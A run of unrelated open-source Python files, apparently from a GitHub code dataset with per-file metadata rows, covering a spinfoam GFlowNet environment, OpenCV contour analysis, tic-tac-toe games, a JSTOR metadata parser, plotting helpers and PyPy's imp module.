self.n_boundary_intertwiners = n_boundary_intertwiners
self.n_vertices = n_vertices
self.spin_j = float(spin_j)
self.single_vertex_amplitudes = tf.convert_to_tensor(
_load_vertex_amplitudes(self.spin_j), dtype=tf.float64
)
@tf.function
def get_spinfoam_amplitudes(self, boundary_intertwiners):
pass
class StarModelSpinFoam(BaseSpinFoam):
def __init__(self, spin_j):
super().__init__(spin_j, n_boundary_intertwiners=20, n_vertices=6)
@tf.function(input_signature=[
tf.TensorSpec(shape=(None, 4), dtype=tf.int32),
])
def _get_amplitude_per_star_edge(self, boundary_intertwiners_per_edge):
amplitude = tf.gather_nd(
self.single_vertex_amplitudes, boundary_intertwiners_per_edge
)
return amplitude
@tf.function(input_signature=[
tf.TensorSpec(shape=(None, 20), dtype=tf.int32),
])
def get_spinfoam_amplitudes(self, boundary_intertwiners):
vertex_1 = self._get_amplitude_per_star_edge(
boundary_intertwiners[:, :4]
)
vertex_2 = self._get_amplitude_per_star_edge(
boundary_intertwiners[:, 4:8]
)
vertex_3 = self._get_amplitude_per_star_edge(
boundary_intertwiners[:, 8:12]
)
vertex_4 = self._get_amplitude_per_star_edge(
boundary_intertwiners[:, 12:16]
)
vertex_5 = self._get_amplitude_per_star_edge(
boundary_intertwiners[:, 16:20]
)
star_amplitudes = tf.einsum(
"abcde, ie, id, ic, ib, ia -> i",
self.single_vertex_amplitudes,
vertex_1, vertex_2, vertex_3, vertex_4, vertex_5
)
return star_amplitudes
class SingleVertexSpinFoam(BaseSpinFoam):
def __init__(self, spin_j):
super().__init__(spin_j, n_boundary_intertwiners=5, n_vertices=1)
@tf.function(input_signature=[
tf.TensorSpec(shape=(None, 5), dtype=tf.int32),
])
def get_spinfoam_amplitudes(self, boundary_intertwiners):
return tf.gather_nd(self.single_vertex_amplitudes, boundary_intertwiners)
class SpinFoamEnvironment:
"""
This class creates the hypergrid environment which the GFlowNet agent
interacts with. Loads the precalculated amplitudes for a single vertex,
calculates the corresponding probabilities, and stores them in self.rewards
Parameters:
----------
spin_j: (float)
Length of the grid in one dimension is 2*spin_j + 1. All
the lengths are equal in all dimensions
spinfoam_model: BaseSpinFoam
Python class representing a specific spinfoam model
n_boundary_intertwiners
- stores the number of boundary intertwiners
- represents the number of dimensions for the
environment grid
get_spinfoam_amplitudes()
- function that calculates the amplitudes of a specific
spinfoam model
- will be used to calculate the rewards for each position
in the environment grid
"""
def __init__(self, spinfoam_model: BaseSpinFoam):
self.spinfoam_model = spinfoam_model
self.grid_dimension = self.spinfoam_model.n_boundary_intertwiners
self.grid_length = int(2 * self.spinfoam_model.spin_j + 1)
@tf.function(input_signature=[tf.TensorSpec(shape=None, dtype=tf.int32)])
def reset_for_forward_sampling(self, batch_size):
"""Generate positions at the hypergrid origin of size batch_size"""
positions = tf.zeros(
shape=(batch_size, self.grid_dimension),
dtype=tf.int32
)
return positions
@staticmethod
@tf.function(input_signature=[
tf.TensorSpec(shape=(None, None), dtype=tf.int32),
tf.TensorSpec(shape=(None, None), dtype=tf.int32),
])
def step_forward(current_position, forward_action):
new_position = current_position + forward_action[:, :-1]
return new_position
@tf.function(input_signature=[tf.TensorSpec(shape=(None, None), dtype=tf.int32)])
def get_rewards(self, positions):
"""Get the corresponding rewards for positions"""
rewards = tf.reshape(
self._get_squared_spinfoam_amplitudes(positions), shape=(-1, 1)
)
return rewards
@tf.function(input_signature=[
tf.TensorSpec(shape=(None, None), dtype=tf.int32),
])
def _get_squared_spinfoam_amplitudes(self, positions):
return tf.math.square(
self.spinfoam_model.get_spinfoam_amplitudes(positions)
)
@tf.function
def reset_for_backward_sampling(self, batch_size):
"""Generate random positions in the hypergrid of size batch_size"""
positions = tf.random.uniform(
shape=(batch_size, self.grid_dimension),
minval=0, maxval=self.grid_length, dtype=tf.int32
)
return positions
@staticmethod
@tf.function
def step_backward(current_position, back_action):
new_position = current_position - back_action
return new_position
def _load_vertex_amplitudes(spin_j):
vertex = np.load(f"{ROOT_DIR}/data/EPRL_vertices/Python/Dl_20/vertex_j_{spin_j}.npz")
return vertex
| JosephRRB/GFlowNets_on_SpinFoams | core/environment.py | environment.py | py | 5,633 | python | en | code | 1 | github-code | 36 |
26419246863 | import cv2
import numpy as np
from functions import top_offset
class SceneMoments():
def __init__(self, sections_img, color, min_contour_size=1000, type_object="", offset=True, compl=False):
self.min_contour_size = min_contour_size
self.type_object = type_object
self.bw = np.all(sections_img == color, axis=-1).astype(np.uint8)
if offset:
self.bw = self.bw[top_offset:,:]
cv2.waitKey(0)
sections_bw = self.bw * 255
self.contours = self.get_contours(sections_bw)
self.contour, self.contour_index = self.get_contour()
self.defects = self.get_defects()
self.compl = compl
if compl:
sections_bw_compl = 255 - sections_bw
self.contours_compl = self.get_contours(sections_bw_compl)
self.defects_compl = self.get_defects()
def get_contours(self, img_bw):
contours, _ = cv2.findContours(img_bw, cv2.RETR_LIST, cv2.CHAIN_APPROX_NONE)
return contours
def get_defects(self):
chull_list = [cv2.convexHull(contour,returnPoints=False) for contour in self.contours]
defects = [cv2.convexityDefects(contour, chull) for (contour,chull) in zip(self.contours, chull_list)]
if len(defects) == 0 or np.all(np.equal(defects[0], None)):
return []
defect = defects[self.contour_index]
if not isinstance(defect, np.ndarray):
return []
defect = defect[:,0,:].tolist()
defect = [[start, end, mid, length] for start, end, mid, length in defect if length > self.min_contour_size]
return defect
'''
Return the largest contour
'''
def get_contour(self):
if len(self.contours) == 0:
return [], -1
largest_area = 0
contour = self.contours[0]
i = 0
for _i, _contour in enumerate(self.contours):
area = cv2.contourArea(_contour)
if area > largest_area:
largest_area = area
contour = _contour
i = _i
return contour, i
# return self.contours[0], 0
'''
Return a list of string containing useful data about the object: length of the contours and length of the defects for both, complement and normal
'''
def sstr(self):
if not self.compl:
lengths = "{} contours: {} defects: {}".format(self.type_object, len(self.contours), len(self.defects))
return [lengths, ""]
else:
lengths = "{} contours: {} defects: {}".format(self.type_object, len(self.contours), len(self.defects))
lengths_compl = "Compl contours: {} defects: {}".format(len(self.contours_compl), len(self.defects_compl))
return [lengths, lengths_compl, ""]
def paint_defects(self, img, color):
if len(self.contours) == 0:
return img
contour = self.contour
for s, e, m, l in self.defects:
cv2.circle(img, (contour[m][0][0], contour[m][0][1] + top_offset), 5, color, -1)
return img
def paint_lines(self, img, color):
if len(self.contours) == 0:
return img
contour = self.contour
for s, e, m, l in self.defects:
cv2.line(img, (contour[s][0][0], contour[s][0][1] + top_offset), (contour[e][0][0], contour[e][0][1] + top_offset), color, 2)
return img
def paint_contours(self, img, color):
if len(self.contours) == 0:
return img
contour = self.contour
contour = np.array([[[c[0][0], c[0][1] + top_offset]] for c in contour])
cv2.drawContours(img, contour, -1, color, 2)
return img | onmax/Robotics | scene-detection/detection/scene_moments.py | scene_moments.py | py | 3,808 | python | en | code | 0 | github-code | 36 |
74160109863 | cube = lambda x: x ** 3
def fibonacci(n):
result = []
i = 0
a, b = 0, 1
while i < n:
result.append(a)
a, b = b, a + b
i += 1
return result
print(list(map(cube, fibonacci(int(input()))))) | CodingProgrammer/HackerRank_Python | (Python Functionals)Map_and_Lambda_Function.py | (Python Functionals)Map_and_Lambda_Function.py | py | 232 | python | en | code | 0 | github-code | 36 |
71622209064 | import copy
import random
# # ---------------Input File & board dimension----------------/
input_txt = open("input15.txt", "r")
board_dimension = int(input_txt.readline())
board_area = [[0 for i in range(board_dimension)] for j in range(board_dimension)]
for i in range(0, board_dimension):
row = input_txt.readline()
for j in range(0, board_dimension):
board_area[i][j] = int(row[j])
input_txt.close()
# def get_converage_array(x, y, board_area):
# ## Set Dummy Value to identify index later
# board_area = copy.deepcopy(board_area)
# board_area[x][y] = 100
# matrix_dim = len(board_area)
# row_limit = [x - 3, x + 3 + 1]
# col_limit = [y - 3, y + 3 + 1]
# if col_limit[0] < 0:
# col_limit[0] = 0
# if col_limit[1] > matrix_dim:
# col_limit[1] = matrix_dim
# if row_limit[0] < 0:
# row_limit[0] = 0
# if row_limit[1] > matrix_dim:
# row_limit[1] = matrix_dim
# subset = [l[col_limit[0]:col_limit[1]] for l in board_area[row_limit[0]:row_limit[1]]]
# return subset
# def get_new_x_and_y(coverage_array):
# new_x, new_y = None, None
# ## Can be optimized
# for i in range(len(coverage_array)):
# for j in range(len(coverage_array[0])):
# if coverage_array[i][j] == 100:
# new_x, new_y = i, j
# break
# return new_x, new_y
# def get_transformed_array(new_x, new_y, coverage_array):
# valid_coverage_array = copy.deepcopy(coverage_array)
# ## Setting value 9 to count later
# for i in range(len(valid_coverage_array)):
# for j in range(len(valid_coverage_array[0])):
# if i == new_x or j == new_y or (abs(new_x - i) == abs(new_y - j)):
# if coverage_array[i][j] == 0:
# valid_coverage_array[i][j] = 9
# return valid_coverage_array
def get_total_cells_covered_at_point_and_covered_coordinates(x, y, inp_board):
block_row_left = False
block_row_right = False
block_col_up = False
block_col_down = False
block_diag_lr_down = False
block_diag_lr_up = False
block_diag_rl_down = False
block_diag_rl_up = False
convered_coordinates = []
def check_condition(x, y, board_area):
n_row = len(board_area)
n_col = len(board_area[0])
n_row_index = n_row - 1
n_col_index = n_col - 1
if x > n_row_index or y > n_col_index or x < 0 or y < 0:
return 0
if board_area[x][y] != 3:
return 1
return 0
i = 1
valid_coverage_cell_count = 1
convered_coordinates.append([x, y])
while (i <= 3):
# Row Left
if not block_row_left:
if check_condition(x, y + i, inp_board):
convered_coordinates.append([x, y + i])
valid_coverage_cell_count += 1
else:
block_row_left = True
# Row Right
if not block_row_right:
if check_condition(x, y - i, inp_board):
convered_coordinates.append([x, y - i])
valid_coverage_cell_count += 1
else:
block_row_right = True
# Col Up
if not block_col_up:
if check_condition(x - i, y, inp_board):
convered_coordinates.append([x - i, y])
valid_coverage_cell_count += 1
else:
block_col_up = True
# Col Down
if not block_col_down:
if check_condition(x + i, y, inp_board):
convered_coordinates.append([x + i, y])
valid_coverage_cell_count += 1
else:
block_col_down = True
# Diagnol L->R Down
if not block_diag_lr_down:
if check_condition(x + i, y + i, inp_board):
convered_coordinates.append([x + i, y + i])
valid_coverage_cell_count += 1
else:
block_diag_lr_down = True
# Diagnol L->R Up
if not block_diag_lr_up:
if check_condition(x - i, y - i, inp_board):
convered_coordinates.append([x - i, y - i])
valid_coverage_cell_count += 1
else:
block_diag_lr_up = True
# Diagnol R->L Down
if not block_diag_rl_down:
if check_condition(x - i, y + i, inp_board):
convered_coordinates.append([x - i, y + i])
valid_coverage_cell_count += 1
else:
block_diag_rl_down = True
# Diagnol R->L Up
if not block_diag_rl_up:
if check_condition(x + i, y - i, inp_board):
convered_coordinates.append([x + i, y - i])
valid_coverage_cell_count += 1
else:
block_diag_rl_up = True
i += 1
return convered_coordinates, valid_coverage_cell_count
def simulation_action(sim_board_input):
max_value = -99
max_value_x = None
max_value_y = None
max_convered_coordinates = None
result_dict = {}
for i in range(len(sim_board_input)):
for j in range((len(sim_board_input))):
if sim_board_input[i][j] != 0:
continue
# coverage_array = get_converage_array(i, j, sim_board_input)
# new_x, new_y = get_new_x_and_y(coverage_array)
# valid_coverage_array = get_transformed_array(new_x, new_y, coverage_array)
convered_coordinates, coverage_value = get_total_cells_covered_at_point_and_covered_coordinates(i, j,
sim_board_input)
if coverage_value > max_value:
max_value = coverage_value
max_value_x, max_value_y = i, j
max_convered_coordinates = convered_coordinates
result_dict['max_value'] = max_value
result_dict['max_value_x'] = max_value_x
result_dict['max_value_y'] = max_value_y
result_dict['max_convered_coordinates'] = max_convered_coordinates
return result_dict
def calculate_score(my_board, opp_board):
my_score = sum(x.count(10) for x in my_board)
my_score += sum(x.count(1) for x in my_board)
opp_score = sum(x.count(20) for x in opp_board)
opp_score += sum(x.count(2) for x in opp_board)
return my_score - opp_score
def simulate(i, j, board_input, print_logs=False):
my_coverage = copy.deepcopy(board_input)
opp_coverage = copy.deepcopy(board_input)
board_sim_input = copy.deepcopy(board_input)
board_sim_input[i][j] = 1
my_coverage[i][j] = 1
convered_coordinates, coverage_value = get_total_cells_covered_at_point_and_covered_coordinates(i, j,
board_sim_input)
for _pos in convered_coordinates:
my_coverage[_pos[0]][_pos[1]] = 10
board_sim_input[_pos[0]][_pos[1]] = 10
if print_logs:
print('I Selected : ({}, {})'.format(i, j))
# print('({}, {}) Simulation Base Score: {}'.format(i, j, calculate_score(my_coverage, opp_coverage)))
# n_sim = sum(x.count(0) for x in board_sim_input)
counter = 1
while (sum(x.count(0) for x in board_sim_input) != 0):
res_dict = simulation_action(board_sim_input)
if counter % 2 == 0:
for _pos in res_dict['max_convered_coordinates']:
my_coverage[_pos[0]][_pos[1]] = 10
if board_sim_input[_pos[0]][_pos[1]] != 0:
board_sim_input[_pos[0]][_pos[1]] = 30
else:
board_sim_input[_pos[0]][_pos[1]] = 10
board_sim_input[res_dict['max_value_x']][res_dict['max_value_y']] = 1
if print_logs:
print('I Selected : ({}, {})'.format(res_dict['max_value_x'], res_dict['max_value_y']))
else:
for _pos in res_dict['max_convered_coordinates']:
opp_coverage[_pos[0]][_pos[1]] = 20
if board_sim_input[_pos[0]][_pos[1]] != 0:
board_sim_input[_pos[0]][_pos[1]] = 30
else:
board_sim_input[_pos[0]][_pos[1]] = 20
board_sim_input[res_dict['max_value_x']][res_dict['max_value_y']] = 2
if print_logs:
print('Opp Selected : ({}, {})'.format(res_dict['max_value_x'], res_dict['max_value_y']))
if print_logs:
pass
# print(np.matrix(my_coverage))
# print(np.matrix(opp_coverage))
print(np.matrix(board_sim_input))
print('({}, {}) Simulation number: {} Score: {}'.format(i, j, counter,
calculate_score(my_coverage, opp_coverage)))
counter += 1
if print_logs:
print(np.matrix(board_sim_input))
print('({}, {}) Simlutaion, Final Score: {}'.format(i, j, calculate_score(my_coverage, opp_coverage)))
return calculate_score(my_coverage, opp_coverage)
def main(sim_board_input, print_logs=False):
final_res_dict = {}
max_value = -99
max_value_x = None
max_value_y = None
sim_board_input_copy = copy.deepcopy(sim_board_input)
for i in range(len(sim_board_input)):
for j in range((len(sim_board_input))):
if sim_board_input_copy[i][j] == 1:
convered_coordinates, coverage_value = get_total_cells_covered_at_point_and_covered_coordinates(i, j,
sim_board_input_copy)
for _pos in convered_coordinates:
sim_board_input[_pos[0]][_pos[1]] = 10
if sim_board_input_copy[i][j] == 2:
convered_coordinates, coverage_value = get_total_cells_covered_at_point_and_covered_coordinates(i, j,
sim_board_input_copy)
for _pos in convered_coordinates:
if sim_board_input[_pos[0]][_pos[1]] == 10:
sim_board_input[_pos[0]][_pos[1]] = 30
else:
sim_board_input[_pos[0]][_pos[1]] = 20
for i in range(len(sim_board_input)):
for j in range((len(sim_board_input))):
if sim_board_input[i][j] != 0:
continue
coverage_score = simulate(i, j, sim_board_input, print_logs=False)
if coverage_score > max_value:
max_value = coverage_score
max_value_x, max_value_y = i, j
if print_logs:
print("Best Location Coordinated (X, Y) = ({}, {}) and Final Score = {}".format(max_value_x, max_value_y,
max_value))
print("*" * 100)
print('Simulation: ')
print("*" * 100)
print('Input Matrix: ')
print(np.matrix(sim_board_input))
res_sim = simulate(max_value_x, max_value_y, sim_board_input, print_logs)
final_res_dict['max_value_x'] = max_value_x
final_res_dict['max_value_y'] = max_value_y
final_res_dict['final_score'] = max_value
abc = int(max_value_x)
xyz = int(max_value_y)
# Output Required Coordinates
with open("output.txt", "w") as f2:
f2.write("%d %d" % (abc, xyz))
#print("Move coordinates: (%d, %d)" %(abc, xyz))
main(board_area)
# main(board_area, print_logs=True) | addyg/AI_Game_Algorithm | ai_program_v5.1.py | ai_program_v5.1.py | py | 11,434 | python | en | code | 2 | github-code | 36 |
6821308185 | import csv
import random
import math
import numpy as np
input = open('data_pool_rabel_sorted.csv', 'r', encoding='utf-8')
input_reader = csv.reader(input)
output = open('data_rabel_pool.csv', 'w', encoding='utf-8')
output_writer = csv.writer(output)
check = 0
num = 0
length = 0
curr = -1
ret = []
for line in input_reader: #0 : length, #1 : discared, #2: rabel, #3 : id #4 : in id order, after is zum/
if(check == 0): #real first
check = 1
length = int(line[0])
ret = [int(line[3]), int(line[2])]
curr = int(line[3])
temp = line[5:5+int(line[0])*2]
ret = ret + temp
continue
if(int(line[3]) == curr):
length = length + int(line[0])
temp = line[5:5+int(line[0])*2]
ret = ret + temp
continue
#not same.
ret = [length] + ret
output_writer.writerow(ret)
curr = int(line[3])
ret = [int(line[3]), int(line[2])]
temp = line[5:5+int(line[0])*2]
ret = ret + temp
length = int(line[0])
ret = [length] + ret
output_writer.writerow(ret)
input.close()
output.close()
| KyeongmoonKim/recognition_of_the_numeral_gesture | data3.py | data3.py | py | 1,030 | python | en | code | 0 | github-code | 36 |
6824189243 | import math
def primeCheck(num):
prime = math.sqrt(num)
for i in range(2,int(prime)) :
if num%i == 0:
return False
return True
def sol(N):
stack = []
for num in range(pow(10,N-1),pow(10,N)) :
if primeCheck(num) :
stack.append(num)
print(stack)
if __name__ == "__main__" :
N = int(input())
sol(N)
| yeonwook1993/algorithm_study | bfs_dfs/2023.py | 2023.py | py | 320 | python | en | code | 0 | github-code | 36 |
16515258502 | """
ARGUMENTS: python3 ParseMetaFilesUpdated.py <path-to-jstor-data> <which-part> <how-many-parts> <output-path>
<how-many-parts>: for parallel processing, this should be the number of workers available to run the program; 1 if not running in parallel.
<which-part>: for parallel processing, this should be a unique number for each worker, from 1 to <how-many-parts>; 1 if not running in parallel.
USAGE: This program takes already-split dictionaries and reads in a batch of JSTOR article n-gram files to count the number of appearances of each n-gram in the dictionaries.
INPUT: JSTOR metadata files.
OUTPUT: A table in HDF5 format, indexed on 'file_name', consisting of 18 columns.
"""
import math
import os
import re
import sys
from tqdm import tqdm
from xml.etree import ElementTree as ET
import pandas as pd
# check if improper number of arguments; if so, return instructions and quit
if len(sys.argv) != 5:
print(__doc__)
exit()
# read in arguments from command line
JSTOR_HOME, NUM, NUM_CPUS, OUTPATH = sys.argv[1:]
NUM, NUM_CPUS = int(NUM), int(NUM_CPUS)
METADATA_HOME = os.path.join(JSTOR_HOME, 'metadata/')
path, dirs, files = next(os.walk(METADATA_HOME))
files = [(path + file) for file in files] # Add folder name "path" as prefix to file
NUM_EACH = math.ceil(len(files) / NUM_CPUS)
LEFT = (NUM - 1) * NUM_EACH
RIGHT = LEFT + NUM_EACH
files = files[LEFT:RIGHT]
def add(elem, attrs):
# TO DO: Filter by article-type?
elements = attrs['elements']
surnames = attrs['surname']
given_names = attrs['given-names']
tag = elem.tag
if tag in attrs['df_cols']:
if tag == 'journal-id':
tag = 'journal_id'
elif tag == 'article':
article_attrs = elem.attrib
article_type = article_attrs['article-type']
tag = 'type'
elem.text = article_type
elif tag =='journal-title':
tag = 'journal_title'
elif tag == 'article-id':
tag = 'article_id'
elif tag == 'article-name':
tag = 'article_name'
elif tag == 'surname':
if type(elem.text) == 'str':
surnames.append(elem.text.split(',')[0])
else:
surnames.append('None')
elem.text = surnames
elif tag == 'given-names':
tag = 'given_names'
given_names.append(elem.text)
elem.text = given_names
elif tag == 'issue-id':
tag = 'issue_id'
elif tag == 'ns1:ref':
tag = 'jstor_url'
elif tag == 'p':
tag = 'abstract'
# if tag not in elements:
# elements[tag] = pd.Series([elem.text])
# else:
# elements[tag].append(pd.Series([elem.text]), ignore_index=True)
len_list = len(elements[tag])
elements[tag][len_list - 1] = elem.text
for child in elem.findall('*'):
add(child, attrs)
def xml2df(xml_files):
"""Transforms XML files into a Pandas DataFrame.
Args:
files: list of complete file paths
Returns:
df: DataFrame with article info"""
all_records = {'type':[], 'journal_id':[], 'journal_title':[], 'issn':[], 'article_id':[], 'article_name':[], 'given_names':[], 'surname':[], 'day':[], 'month':[], 'year':[], 'volume':[], 'issue':[], 'issue_id':[], 'fpage':[], 'lpage':[], 'jstor_url':[], 'abstract':[]}
attrs = {}
attrs['elements'] = all_records
attrs['surname'] = []
attrs['given-names'] = []
attrs['df_cols'] = ['article', 'journal-id', 'journal-title', 'issn', 'article-id', 'article-name', 'given-names', 'surname', 'day', 'month', 'year', 'volume', 'issue', 'issue-id', 'fpage', 'lpage', 'ns1:ref', 'p']
for file in tqdm(xml_files):
with open(file, 'rb') as f:
t = ET.parse(f) # element tree
root = t.getroot()
for record in all_records:
all_records[record].append('None')
add(root, attrs)
#print(all_records)
print ('Start creating data frame')
df = pd.DataFrame(all_records)
return df
# This is definitely NOT a good practice. However, I'm trying not to break what's running properly.
def amend_df(df, files):
file_names = []
jstor_urls = []
abstracts = []
article_names = []
for file in tqdm(files):
file_names.append(re.findall('journal-article-.+\.xml', file)[0][:-4])
with open(file, 'rb') as f:
t = ET.parse(f) # element tree
root = t.getroot()
try:
jstor_urls.append(root.find('front').find('article-meta').find('self-uri').items()[0][1])
except:
jstor_urls.append('None')
try:
abstracts.append(root.find('front').find('article-meta').find('abstract').find('p').text)
except:
abstracts.append('None')
try:
article_names.append(root.find('front').find('article-meta').find('title-group').find('article-title').text)
except:
article_names.append('None')
df.loc[:, 'file_name'] = file_names
df.loc[:, 'jstor_url'] = jstor_urls
df.loc[:, 'abstract'] = abstracts
df.loc[:, 'article_name'] = article_names
print('Start processing')
df = xml2df(files)
print('Start amending')
amend_df(df, files)
# df.to_pickle('pickles/part{}.pickle'.format(n))
df.set_index('file_name').to_hdf(os.path.join(OUTPATH, 'part{}.h5'.format(NUM)), key='metadata', mode='w')
#df.set_index('file_name').to_pickle(os.path.join(OUTPATH, 'part{}.pickle'.format(NUM))) | h2researchgroup/dictionary_methods | code/ParseMetaFilesUpdated.py | ParseMetaFilesUpdated.py | py | 5,612 | python | en | code | 0 | github-code | 36 |
16534298320 | import matplotlib.pyplot as plt
import seaborn as sns
sns.set()
class VizHelp():
# Additional Usefull Display Methods
def plotPredictions(self, predictions, targets, decoder_steps, epochs, file_name, show=True):
stock_name = file_name.split('.')[0].upper()
if '/' in stock_name:
stock_name = stock_name.split('/')[-1]
plt.plot(targets, label='Actual')
plt.plot(predictions, label='Predicted')
plt.legend()
plt.xlabel('Samples')
plt.ylabel('Scaled Price')
plt.title(f'Price Prediction {stock_name}: D={decoder_steps}, Epoch={epochs}', fontsize=14)
print(f'Saving image to: plots/Test_{stock_name}D{decoder_steps}_E{epochs}.png')
plt.savefig(f'plots/Test_{stock_name}_D{decoder_steps}_E{epochs}.png')
if show:
plt.show()
else:
plt.close()
def plotMSE(self, errors, decoder_steps, num_samples=1, name='', show=True):
epoch_counts = [i/num_samples for i in range(len(errors))]
plt.plot(epoch_counts, errors)
plt.xlabel('Epochs')
plt.ylabel('MSE')
plt.title(f'MSE {name}: D={decoder_steps}', fontsize=14)
print(f'Saving image to: plots/{name}D{decoder_steps}_E{epoch_counts[-1]}.png')
plt.savefig(f'plots/{name}_D{decoder_steps}_E{epoch_counts[-1]}.png')
if show:
plt.show()
else:
plt.close() | rvariverpirate/TRN_StockPrediction | VisualizationHelpers.py | VisualizationHelpers.py | py | 1,429 | python | en | code | 0 | github-code | 36 |
16277554121 | import pygame
from constants import *
import numpy
class Board:
# Initializing the board with screen as an input
def __init__(self, screen) -> None:
self.screen = screen
self.game_array = numpy.zeros((WINDOW_SIZE // CUBE_SIZE, WINDOW_SIZE // CUBE_SIZE))
self.draw_board()
self.turn = 1
self.game_is_on = True
# Drawing the board
def draw_board(self):
# Drawing vertical lines
for x in range(1, VERTICAL_LINES + 1):
pygame.draw.line(self.screen, BLACK, (0, CUBE_SIZE * x), (CUBE_SIZE * 3, CUBE_SIZE * x), LINE_WIDTH)
# Drawing horizontal lines
for y in range(1, HORIZONTAL_LINES + 1):
pygame.draw.line(self.screen, BLACK, (CUBE_SIZE * y, 0), (CUBE_SIZE * y, CUBE_SIZE * 3), LINE_WIDTH)
# Changing turn
def change_turn(self):
self.turn *= -1
# Checking if field is available
def is_available(self, pos) -> bool:
if self.game_array[pos[0]][pos[1]] == 0:
return True
return False
# Putting mark on the field and changing turn
def put_mark(self, pos):
if self.is_available(pos):
# -1 is cross
if self.turn == -1:
# Loading image of a cross
img = pygame.image.load("Tic_Tac_Toe/resources/cross.png")
img = pygame.transform.scale(img, (CUBE_SIZE // 1.5, CUBE_SIZE // 1.5))
# 1 is dot
elif self.turn == 1:
# Loading image of a dot
img = pygame.image.load("Tic_Tac_Toe/resources/dot.png")
img = pygame.transform.scale(img, (CUBE_SIZE // 1.5, CUBE_SIZE // 1.5))
self.game_array[pos[0]][pos[1]] = self.turn
x = pos[0] * CUBE_SIZE + CUBE_SIZE // 6
y = pos[1] * CUBE_SIZE + CUBE_SIZE // 6
self.screen.blit(img, (y, x))
self.change_turn()
# Winning line
def draw_winning_line(self, start_pos:tuple, end_pos:tuple):
start_x = start_pos[0] * CUBE_SIZE + CUBE_SIZE // 2
start_y = start_pos[1] * CUBE_SIZE + CUBE_SIZE // 2
end_x = end_pos[0] * CUBE_SIZE + CUBE_SIZE // 2
end_y = end_pos[1] * CUBE_SIZE + CUBE_SIZE // 2
return pygame.draw.line(self.screen, RED, (start_x, start_y), (end_x, end_y), LINE_WIDTH)
# Ending text
def write_ending_text(self, text:str):
font = pygame.font.Font(None, 36)
text = font.render(f"{text}", True, BLACK)
space = font.render("Press Space to Restart", True, BLACK)
self.screen.blit(text, (15, 15))
self.screen.blit(space, (CUBE_SIZE + CUBE_SIZE // 12, WINDOW_SIZE // 1.05))
# Checking for win or tie
def check_for_win(self):
# Checking if win for rows
for row in range(3):
winning_row = 0
for col in range(3):
if self.game_array[row][col] == 1:
winning_row += 1
elif self.game_array[row][col] == -1:
winning_row += -1
# Checking if row is full of X or O
if winning_row == 3:
self.write_ending_text("Dot wins!")
self.draw_winning_line((0, row),(2, row))
self.game_is_on = False
break
elif winning_row == -3:
self.write_ending_text("Cross wins!")
self.draw_winning_line((0, row),(2, row))
self.game_is_on = False
break
# Checking if win for cols
for row in range(3):
winning_col = 0
for col in range(3):
if self.game_array[col][row] == 1:
winning_col += 1
elif self.game_array[col][row] == -1:
winning_col += -1
# Checking if column is full of X or O
if winning_col == 3:
self.write_ending_text("Dot wins!")
self.draw_winning_line((row, 0),(row, 2))
self.game_is_on = False
break
elif winning_col == -3:
self.write_ending_text("Cross wins!")
self.draw_winning_line((row, 0),(row, 2))
self.game_is_on = False
break
# Checking if win for axis
if self.game_array[0][0] + self.game_array[1][1] + self.game_array[2][2] == 3:
self.write_ending_text("Dot wins!")
self.draw_winning_line((0, 0),(2, 2))
self.game_is_on = False
elif self.game_array[0][2] + self.game_array[1][1] + self.game_array[2][0] == 3:
self.write_ending_text("Dot wins!")
self.draw_winning_line((0, 2),(2, 0))
self.game_is_on = False
elif self.game_array[0][0] + self.game_array[1][1] + self.game_array[2][2] == -3:
self.write_ending_text("Cross wins!")
self.draw_winning_line((0, 0),(2, 2))
self.game_is_on = False
elif self.game_array[0][2] + self.game_array[1][1] + self.game_array[2][0] == -3:
self.write_ending_text("Cross wins!")
self.draw_winning_line((0, 2),(2, 0))
self.game_is_on = False
# Checking for a tie
num_of_zeroes = 0
for row in range(3):
for col in range(3):
if self.game_array[row][col] == 0:
num_of_zeroes += 1
if num_of_zeroes == 0 and self.game_is_on:
self.write_ending_text("It's a tie!")
self.game_is_on = False
| szczepanspl/tic_tac_toe | board.py | board.py | py | 5,668 | python | en | code | 0 | github-code | 36 |
43298614784 | from pypy.module.imp import importing
from pypy.module._file.interp_file import W_File
from rpython.rlib import streamio
from rpython.rlib.streamio import StreamErrors
from pypy.interpreter.error import oefmt
from pypy.interpreter.module import Module
from pypy.interpreter.gateway import unwrap_spec
from pypy.interpreter.streamutil import wrap_streamerror
def get_suffixes(space):
    """Implement imp.get_suffixes(): list of (suffix, mode, module-type) tuples.

    The C-extension suffix is included only when the build supports shared
    objects; '.py' and '.pyc' entries are always present.
    """
    suffixes_w = []
    if importing.has_so_extension(space):
        suffixes_w.append(
            space.newtuple([space.newtext(importing.get_so_extension(space)),
                            space.newtext('rb'),
                            space.newint(importing.C_EXTENSION)]))
    suffixes_w.extend([
        space.newtuple([space.newtext('.py'),
                        space.newtext('U'),
                        space.newint(importing.PY_SOURCE)]),
        space.newtuple([space.newtext('.pyc'),
                        space.newtext('rb'),
                        space.newint(importing.PY_COMPILED)]),
        ])
    return space.newlist(suffixes_w)
def get_magic(space):
    """Implement imp.get_magic(): the pyc magic number as a 4-byte
    little-endian string (low byte first)."""
    x = importing.get_pyc_magic(space)
    a = x & 0xff
    x >>= 8
    b = x & 0xff
    x >>= 8
    c = x & 0xff
    x >>= 8
    d = x & 0xff
    return space.newbytes(chr(a) + chr(b) + chr(c) + chr(d))
def get_file(space, w_file, filename, filemode):
    """Return a stream for `filename`: open a new one when w_file is None,
    otherwise reuse the stream of the given file object."""
    if space.is_none(w_file):
        try:
            return streamio.open_file_as_stream(filename, filemode)
        except StreamErrors as e:
            # XXX this is not quite the correct place, but it will do for now.
            # XXX see the issue which I'm sure exists already but whose number
            # XXX I cannot find any more...
            raise wrap_streamerror(space, e)
    else:
        return space.interp_w(W_File, w_file).stream
def find_module(space, w_name, w_path=None):
    """Implement imp.find_module(): locate a module and return the tuple
    (file object or None, filename, (suffix, mode, module type))."""
    name = space.text0_w(w_name)
    if space.is_none(w_path):
        w_path = None
    find_info = importing.find_module(
        space, name, w_name, name, w_path, use_loader=False)
    if not find_info:
        raise oefmt(space.w_ImportError, "No module named %s", name)
    w_filename = space.newtext(find_info.filename)
    stream = find_info.stream
    if stream is not None:
        # Wrap the already-open stream in an app-level file object so the
        # caller can pass it back to load_module().
        fileobj = W_File(space)
        fileobj.fdopenstream(
            stream, stream.try_to_find_file_descriptor(),
            find_info.filemode, w_filename)
        w_fileobj = fileobj
    else:
        w_fileobj = space.w_None
    w_import_info = space.newtuple(
        [space.newtext(find_info.suffix),
         space.newtext(find_info.filemode),
         space.newint(find_info.modtype)])
    return space.newtuple([w_fileobj, w_filename, w_import_info])
